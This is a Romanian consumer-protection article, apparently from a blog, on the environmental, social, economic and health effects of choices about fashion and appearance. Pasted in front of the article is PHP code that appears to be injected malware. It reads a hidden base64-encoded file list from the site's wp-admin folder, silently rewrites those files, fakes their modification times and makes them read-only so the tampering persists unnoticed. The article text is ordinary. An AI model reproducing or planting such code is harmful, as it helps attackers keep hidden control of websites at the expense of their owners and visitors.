$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Protecţia-Consumatorilor.ro- o9atitudine! Află ce impact are sustenabilitatea asupra ta şi a celor din jur! – O noua atitudine

          Impactul asupra mediului

          Pentru a arăta bine, cumpărăm haine la modă, însă de prea puţine ori ne informăm despre modul cum sunt produse aceste articole de vestimentaţie şi ce impact au ele asupra mediului.Spre exemplu, pentru a albi sau decolora anumite articole de vestimentaţie se folosesc produse chimice cu impact negativ asupra mediului. De asemenea, si testările diverselor produse cosmetice au impact negativ. În acest sens pentru a arata bine şi a fi sustenabili trebuie sa evaluam fiecare articolsi ce impact are asupra mediului, precum şi care este ponderea produselor care se pot degrada uşor din totalitatea articolelor pe care le achiziţionăm.

          Impactul social

          Sustenabilitatea din punct de vedere social impune a elimina exploatarea minorilor saua altor categorii sociale defavorizate. Când dorim sa fim sustenabili şi să arătam bine nu trebuie să alegem articole prin care vom favoriza activitatea economică subterană, ilegală prin exploatarea minorilor sau a altor categorii defavorizate, care pentru obţinerea unor venituri vor renunţa la şansa lor la educaţie şi la un viitor mai bun.

          Impactul economic

          Tendinţa celor care arată bine este de a achiziţiona mult mai multe articole decât sunt necesare. Ca atare, pentru a evalua impactul nostru din punct de vedere economic trebuie să avem în vedere care ne sunt nevoile concrete şi care este raportul dintre acestea şi dorinţele noastre. Doar aşa putem analiza modul în care ne alocăm bugetul disponibil astfel încât să avem impact minim asupra mediului.

          Trebuie să avem, îndeosebi, grijă la riscul asupra sănătăţii. Riscul asupra sănătăţii este minim când optăm asupra acelor articole care sunt ecologice sau cel puţin care au la bază produse naturale. Multe persoane de orice vârstă merg până la soluţii extreme pentru a atinge standardul de frumuseţe dorit, chiar intervenţii chirurgicale prin tehnici invazive considerabile, înfometare până la anorexie, dietă dezechilibrată prin renunţarea la anumite categorii de alimente, suplimente alimentari şi medicamente pentru atingerea unei forme fizice dorite, haine şi pantofi inconfortabile pentru a fi la modă.

          Fii un consumator informat şi sănătos! Prin alegerea produselor potrivite nevoilor tale, ai grijă de tine şi de cei din jurul tău! Pentru a afla mai multe detalii şi despre alte programele de sustenabilitate, vizitează site-ul www.protectia-consumatorilor.ro sau scrie-ne pe adresa pr@protectia-consumatorilor.ro!

Sursa: Dolceta.ro

 

By o9admin